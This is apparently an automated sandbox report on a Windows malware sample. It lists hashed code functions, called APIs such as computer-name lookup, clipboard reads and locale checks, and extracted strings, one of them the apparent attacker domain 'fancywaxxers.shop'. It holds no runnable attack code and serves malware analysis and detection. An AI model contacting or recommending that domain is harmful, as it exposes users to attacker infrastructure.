                                                                                                          • Opcode Fuzzy Hash: a5ac04ea9e230b6cf3948a8bb0ad38f6cf67380a18d58efd62aba391322e45a0
                                                                                                          • Instruction Fuzzy Hash: 3021D17014C2858EDB218F35A860BFB7FE4DB9B344F58486ED0C9C3292CB39444A9B56

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 520 42b840-42b8b6 call 43f450 525 42b8c0-42b8e5 520->525 525->525 526 42b8e7-42b8f1 525->526 527 42b8f3-42b8fa 526->527 528 42b90b-42b942 GetComputerNameExA 526->528 529 42b900-42b909 527->529 530 42b946 528->530 529->528 529->529 530->530
                                                                                                          APIs
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042B875
                                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerFreeLibraryName
                                                                                                          • String ID: KHGN$#v
                                                                                                          • API String ID: 2904949787-1045450214
                                                                                                          • Opcode ID: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                                          • Instruction ID: 50f42b0a951807a88e86a22aae57dbd367c2f88d39f0ae760fbcdf6f8fc845ea
                                                                                                          • Opcode Fuzzy Hash: 212394f20273f3accb8bcfc3a76da6794d37ce9a05dd71fc593275c859e58dc8
                                                                                                          • Instruction Fuzzy Hash: 001123B01482858FD7219F35E860BEB7FE4EB9B344F54482DD0C9C3251CB39484A9B92
                                                                                                          APIs
                                                                                                          • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerName
                                                                                                          • String ID: bC
                                                                                                          • API String ID: 3545744682-4190571504
                                                                                                          • Opcode ID: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                          • Instruction ID: e82d825c06ad02e345faf7a0e59537a249da3b56fbe03ec142442aa4babbea04
                                                                                                          • Opcode Fuzzy Hash: 1c1f9430f5f3ed989211da8c26079c9bdb17ff075c2385f7f8c8286cc26a0825
                                                                                                          • Instruction Fuzzy Hash: 5421053560D3E18BD7358F2594943FABBE1EF92300F59885EC8CA9B341CA794409CB96
                                                                                                          APIs
                                                                                                          • GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 0042BA54
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerName
                                                                                                          • String ID: bC
                                                                                                          • API String ID: 3545744682-4190571504
                                                                                                          • Opcode ID: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                          • Instruction ID: 8a9ff360a492162640ec0ee52e10ad36b0c35468f5dd3550f358dda6bb680e87
                                                                                                          • Opcode Fuzzy Hash: b23871937633dcdb680c72e96aa5e58338da0fb26077f9adf21ebf2712c0bdc7
                                                                                                          • Instruction Fuzzy Hash: 6B21257660D3A0CBD734CF2094843BAB7E2EFC6300F55895EC8CA9B340CA745806CB96
                                                                                                          APIs
                                                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042B924
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerName
                                                                                                          • String ID: KHGN
                                                                                                          • API String ID: 3545744682-1032087821
                                                                                                          • Opcode ID: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                          • Instruction ID: 800fda513f984b05936c8cd62631b8339e5399499a0172a9c9d32c48e16ec2f1
                                                                                                          • Opcode Fuzzy Hash: a8e5dbbfad83db7d0e3a07a32037c9f22d764ac268d76ac342ec4c4dcc5ae117
                                                                                                          • Instruction Fuzzy Hash: 4F1129B41483858FD7219F35A8A0BFB7FE4DB9B344F54482DD0C9C3241CB39444A9B92
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 00409E1A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029625771-0
                                                                                                          • Opcode ID: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                          • Instruction ID: 794dd10beed9ab1fdd81d0f6796807d90850f10cc366af128ac51e95daa83683
                                                                                                          • Opcode Fuzzy Hash: eab48f6b71edd1e16cfb7ea63385da2791f2a8b668b563faa9f76ea0567173db
                                                                                                          • Instruction Fuzzy Hash: C3110879A842508FC7188F25D8816A97FF1FB55325B19D0ADD491EB363C23CD846CB58
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                                          • Instruction ID: 0f926294dc6f60f2445246b0eb10c1f08d66fb03fcf9e8185527a5568484abe7
                                                                                                          • Opcode Fuzzy Hash: 41a367038b1e6d5b58ec4f6eb87556ec12abeaa4ee6647b370c191bf25488890
                                                                                                          • Instruction Fuzzy Hash: 3AF0F075518302EFD7242F29BC49B17367CEF8B306F04183AF50191062DB35EC059769
                                                                                                          APIs
                                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00436831
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DefaultLanguageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 95929093-0
                                                                                                          • Opcode ID: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                          • Instruction ID: c1e6da90ff38b23c1098b9489220249bba1124fa0f23aac35cb26dcf4f2101a0
                                                                                                          • Opcode Fuzzy Hash: 8b12c406fd4ead613e65197ffde3b6cb62fb5e3e077589beab3fbb298c2b36b5
                                                                                                          • Instruction Fuzzy Hash: 31110434908686CFC719DB3888512A8BFB27F6B304F05839CC48D873A2DB35A954CF22
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                          • Instruction ID: eb4d188fa3b2335ac580bcc65c14ba02f7638069044a76079abd789a2c862b60
                                                                                                          • Opcode Fuzzy Hash: 8f7cb6371b4caf162f46c922943df2f09589c22896729318bee07ad160b03f59
                                                                                                          • Instruction Fuzzy Hash: B8F0E2B56097028FE301DF25C55874BBBE6BBC8314F25891CE0A44B751C7B9AA898FC2
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                          • Instruction ID: 6701a38e9beb56b1775abd9ce08e5b6b7616d16b42eebe8ce345441057ef8d6a
                                                                                                          • Opcode Fuzzy Hash: 2c655fd4df2f0de855ff40a5662be0aaac86da99f90f76558f58a47c1ac7514f
                                                                                                          • Instruction Fuzzy Hash: BBF074B46093029FE354DF69D5A871BBBE1EB88304F11881DE5958B390D7B59648CF82
                                                                                                          APIs
                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Initialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2538663250-0
                                                                                                          • Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                          • Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
                                                                                                          • Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
                                                                                                          • Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E
                                                                                                          APIs
                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 640775948-0
                                                                                                          • Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                                          • Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
                                                                                                          • Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
                                                                                                          • Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 0043E6A5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ForegroundWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2020703349-0
                                                                                                          • Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                                          • Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
                                                                                                          • Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
                                                                                                          • Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                                          • Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
                                                                                                          • Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
                                                                                                          • Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                                          • Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
                                                                                                          • Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
                                                                                                          • Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: A$S,3!$bxA$@AF
                                                                                                          • API String ID: 0-2069903589
                                                                                                          • Opcode ID: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
                                                                                                          • Instruction ID: 6ded76c8cc6ff0f80e96e1d1ae2300ae6fa5ef525a8552055949680e93883b28
                                                                                                          • Opcode Fuzzy Hash: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
                                                                                                          • Instruction Fuzzy Hash: FF72357150C3418BD324CF28C8907ABB7F2EF96314F19896EE4C587392E7398985CB96
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: "0B$%<$$(99#$OIE{$Z_-c$fancywaxxers.shop$gM$-A+$~|$?'
                                                                                                          • API String ID: 0-1279965070
                                                                                                          • Opcode ID: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
                                                                                                          • Instruction ID: 5c5e0a10dac633df7a7eb912dad582696f6b243f8df0ab356ae229ec7ebc779d
                                                                                                          • Opcode Fuzzy Hash: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
                                                                                                          • Instruction Fuzzy Hash: D30279726083919FD318CF25D89176BBBE2FBD2314F588A6CE4D18B395D7788805CB86
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ($?$f$u$}
                                                                                                          • API String ID: 0-3561895482
                                                                                                          • Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                                          • Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
                                                                                                          • Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                                          • Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47
                                                                                                          APIs
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                          • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                                          • API String ID: 237503144-3964871452
                                                                                                          • Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                          • Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
                                                                                                          • Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                          • Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: %$&$9$<$R$T$W$b
                                                                                                          • API String ID: 0-3780034300
                                                                                                          • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                          • Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
                                                                                                          • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                          • Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1494355150-0
                                                                                                          • Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                          • Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
                                                                                                          • Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                          • Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEC0
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,006DA7DD,00000002,00000000,?,?,?,006DA7DD,?,00000000), ref: 006DAEE9
                                                                                                          • GetACP.KERNEL32(?,?,006DA7DD,?,00000000), ref: 006DAEFE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 2299586839-711371036
                                                                                                          • Opcode ID: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
                                                                                                          • Instruction ID: a3fb779c51ef0d171e42a1d4165cc5294c3da53a0f1cafccb4eacd03a24c85dc
                                                                                                          • Opcode Fuzzy Hash: 4935260367bbb3398feae65f36ee465ced9ca90d89c3e04461ef8a8e0cc46e7e
                                                                                                          • Instruction Fuzzy Hash: EA21C572E08200A6DB348F95C900BD777A7EB94B60B5A8466E90ADB300E732DD41E352
                                                                                                          APIs
                                                                                                            • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419E7D
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00419F1E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                          • String ID: NO$#v
                                                                                                          • API String ID: 764372645-2882766750
                                                                                                          • Opcode ID: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                          • Instruction ID: abe4a73a967468b274d366e370c220422a45fd0295e639bb6f5522fed691f7b9
                                                                                                          • Opcode Fuzzy Hash: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                          • Instruction Fuzzy Hash: 26924975A183419BE724CF24C890B6BBBE3ABD5304F29C82EE08587365D679DC91CB47
                                                                                                          APIs
                                                                                                            • Part of subcall function 006D55BA: GetLastError.KERNEL32(00000000,?,006D793D), ref: 006D55BE
                                                                                                            • Part of subcall function 006D55BA: SetLastError.KERNEL32(00000000,?,?,00000028,006D1FF3), ref: 006D5660
                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 006DA7AF
                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 006DA7ED
                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 006DA800
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 006DA848
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 006DA863
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227416988.00000000006C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.2227402386.00000000006C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227447150.00000000006E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227468931.00000000006F0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227485385.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000003.00000002.2227500965.00000000006F8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_6c0000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 415426439-0
                                                                                                          • Opcode ID: a8cb7187fe5466834c958249e762415544ce38f714fd44f19db98873ab0da4bc
                                                                                                          • Instruction ID: 0264bcbfcfb28a30645a1f85456cb465a9d9a15d70cd275fa20013d583c040bc
                                                                                                          • Opcode Fuzzy Hash: a8cb7187fe5466834c958249e762415544ce38f714fd44f19db98873ab0da4bc
                                                                                                          • Instruction Fuzzy Hash: 85516E75E04206AFDB50DFE4DC81AFA77BAFF08700F14456AE901EB390EB7199419B62
                                                                                                          APIs
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                          • String ID: rM$zM
                                                                                                          • API String ID: 237503144-2784921869
                                                                                                          • Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                          • Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
                                                                                                          • Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                          • Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Sin;$YzW+$dMKP$lmeH$xHLG
                                                                                                          • API String ID: 0-2485238161
                                                                                                          • Opcode ID: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
                                                                                                          • Instruction ID: 4aad12527c045970d6953cacdb77c585329f148e38e5d38ad86dba377078a4b1
                                                                                                          • Opcode Fuzzy Hash: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
                                                                                                          • Instruction Fuzzy Hash: 0A2255B16083918FD7109F29E85136BBBE1EF86304F09887EE5C59B381D739D906CB5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.2227328008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_400000_UhsjR3ZFTD.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 3$h2h0$AC$EFG$^
                                                                                                          • API String ID: 0-608315617
